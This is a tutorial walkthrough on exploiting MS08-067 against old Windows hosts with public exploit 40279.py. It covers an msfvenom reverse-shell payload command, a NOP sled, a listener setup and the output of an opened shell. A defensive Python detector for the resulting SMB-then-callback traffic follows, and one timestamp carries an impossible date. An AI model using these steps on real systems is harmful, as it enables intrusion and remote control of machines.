Exploiting MS08-067 without using metasploit.
This has been quite tricky to get working, but in summary, from my experience, you can't use 'nc' as a listener for this because the payload is STAGED (the listener has to send the second stage back after the connect) and 'nc' will only catch STAGELESS payloads.
First, download the Python script.
Next, run msfvenom with the arguments to suit your needs:
msfvenom -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=8080 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode --arch x86 --platform windows
Next, replace the shellcode in the Python script with the shellcode you have just created with msfvenom.
Note - LEAVE THE FIRST THREE LINES (NOPs) IN THE PYTHON SCRIPT.
Lines 47, 48, 49 (the second and third lines append to the first with +=, so the whole NOP sled is kept):
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
---ENTER SHELLCODE HERE ---
Next, make a note of the operating system and service pack of the host you are trying to exploit.
There are 7 options to choose from:
1 Windows XP SP0/1 Universal
2 Windows 2000 Universal
3 Windows 2003 SP0 Universal
4 Windows 2003 SP1 English
5 Windows XP SP3 French (NX)
6 Windows XP SP3 English (NX)
7 Windows XP SP3 English (AlwaysOn NX)
Next, start Metasploit and set up a handler:
use exploit/multi/handler
set LHOST X.X.X.X
set LPORT XXXX
set payload windows/shell/reverse_tcp
exploit -j
Next, execute the Python script with the number that corresponds to the OS and service pack, like so:
python 40279.py 1
You should see the reverse shell returned:
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on X.X.X.X:8080
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to A.A.A.A
[*] Command shell session 10 opened (X.X.X.X:8080 -> A.A.A.A:1219) at 2017-02-00 15:55:22 +0000
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
For reference, this is what the traffic looks like for a successful reverse TCP connection for this particular exploit.
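From the defender's side, the sequence above has a recognisable shape on the wire: an inbound SMB connection (445) to the victim, followed seconds later by an outbound connection from that victim back to the same peer on an unusual port (A.A.A.A:1219 -> X.X.X.X:8080 in the handler output). The following is an added example, not part of the original post or the 40279.py script; it runs that correlation over a constructed flow log, and the port baseline and 60-second window are assumptions.

```python
"""Flag an inbound SMB session followed shortly by an outbound connection from
the same host back to the SMB client on a non-baseline port: the shape of the
staged reverse_tcp shell described in this post."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample flow log: timestamp src_ip src_port dst_ip dst_port.
# 10.0.0.5 plays the attacker, 10.0.0.20 the vulnerable XP host.
SAMPLE_FLOWS = """\
2017-02-01T15:55:10Z 10.0.0.5 49210 10.0.0.20 445
2017-02-01T15:55:11Z 10.0.0.20 1218 10.0.0.50 445
2017-02-01T15:55:22Z 10.0.0.20 1219 10.0.0.5 8080
2017-02-01T15:57:00Z 10.0.0.30 1300 10.0.0.7 80
2017-02-01T16:10:00Z 10.0.0.5 49300 10.0.0.40 445
2017-02-01T16:40:00Z 10.0.0.40 1400 10.0.0.5 8080
"""

SMB_PORTS = {445, 139}
# Assumption: ports a workstation on this network is expected to talk to.
ALLOWED_OUTBOUND = {80, 443, 53, 445, 139}
WINDOW = timedelta(seconds=60)  # assumption: stage is sent within a minute


def parse_flows(text):
    """Parse the space-separated log into (ts, src, sport, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                      src, int(sport), dst, int(dport)))
    return flows


def find_reverse_shell_after_smb(flows, window=WINDOW):
    """Return (victim, peer, dst_port, seconds_since_smb) for each host that
    receives SMB from a peer and then connects back to that peer on a
    non-baseline port within the window."""
    inbound_smb = defaultdict(list)  # victim -> [(ts, smb client)]
    alerts = []
    for ts, src, _sport, dst, dport in sorted(flows):
        if dport in SMB_PORTS:
            inbound_smb[dst].append((ts, src))
        elif dport not in ALLOWED_OUTBOUND:
            for smb_ts, client in inbound_smb[src]:
                if client == dst and timedelta(0) <= ts - smb_ts <= window:
                    alerts.append((src, dst, dport,
                                   int((ts - smb_ts).total_seconds())))
    return alerts
```

The late connection from 10.0.0.40 falls outside the window and is not flagged; tune WINDOW and ALLOWED_OUTBOUND to the environment's baseline.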